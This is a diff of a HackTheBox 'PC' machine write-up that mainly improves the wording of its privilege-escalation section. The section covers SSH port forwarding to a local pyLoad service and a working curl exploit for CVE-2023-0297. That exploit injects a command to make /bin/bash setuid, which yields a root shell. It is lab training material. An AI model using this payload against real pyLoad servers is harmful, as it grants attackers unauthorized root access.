F41zK4r1m/HackTheBox/PC.md

 ## Privilege Escalation:

-I started with manual enumeration & checked few things:
+I began with manual enumeration and checked a few things:

-  - I checked for the sudo permissions but it seems like 'Sau' can't run the sudo commands.
+  - I verified the sudo permissions, but it appears that 'Sau' cannot run sudo commands.
-  - I checked for SUID binaries but nothing helpful here as well.
+  - I examined SUID binaries, but found nothing helpful.
-  - I ran linpeas but didn't found here anything as well.
+  - I ran Linpeas but didn't find any relevant information.

-I then check for the running tcp connections & found a port 8000 listening for some services:
+Next, I checked for running TCP connections and discovered a service listening on port 8000:

 ```bash
 netstat -anot
 ```
 ![image](https://github.com/F41zK4r1m/HackTheBox/assets/87700008/5226b513-6ea9-4853-8a45-aa8a520954b4)

-I performed port forwarding via SSH & opened the service on my host:
+I performed port forwarding via SSH and accessed the service on my local host:

 ```bash
 ssh sau@10.10.11.214 -L 8000:127.0.0.1:8000 -N
 ```

-I found a service running 'pyload' on port 8000, pyLoad is an OSS download manager written in Python and manageable via web interface:
+I identified a service called 'pyload' running on port 8000. pyLoad is an open-source download manager written in Python and can be managed through a web interface:

 ![image](https://github.com/F41zK4r1m/HackTheBox/assets/87700008/e9ebf106-886c-4f46-9977-99856c48e912)

-I tried to bypass the login by performing SQL injection but it didn't worked.
+I attempted to bypass the login by performing an SQL injection, but it didn't work.

-Then I serached for the possible exploits on web & found this blog in [Github](https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad).
+Then, I searched for possible exploits online and came across a blog on GitHub: [CVE-2023-0297_Pre-auth_RCE_in_pyLoad](https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad).

-By following the blog & made some changes in POC by replacing & adding 'chmod u+s /bin/bash' in URL encoded format, I initiated a curl command.
+Following the instructions in the blog, I made some changes to the proof-of-concept (POC) by replacing and adding 'chmod u+s /bin/bash' in URL-encoded format.
+I initiated a curl command:

 ```bash
 curl -i -s -k -X 'POST' --data-binary 'jk=pyimport%20os;os.system("chmod%20u%2Bs%20%2Fbin%2Fbash");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' 'http://127.0.0.1:8000/flash/addcrypted2'
 ```
 ![image](https://github.com/F41zK4r1m/HackTheBox/assets/87700008/f3af3112-1d6e-4dea-a855-c1c6cfd2c3f4)

-After performing the curl request I checked for the /bin/bash again & this time I observed the bash with the root privileges available.
-I then executed 'bash -p' to execute the root bash.
+After executing the curl request, I checked for /bin/bash again and observed that a root-level bash was available.
+I executed 'bash -p' to open the root bash shell:

 ![image](https://github.com/F41zK4r1m/HackTheBox/assets/87700008/0f98c828-e18b-473f-ba38-c459e9a1fb84)

-After getting the root bash I was finally able to fetch the root flag.(pwn3d! 🙂)
+With the root shell, I was able to retrieve the root flag. (pwn3d! 🙂)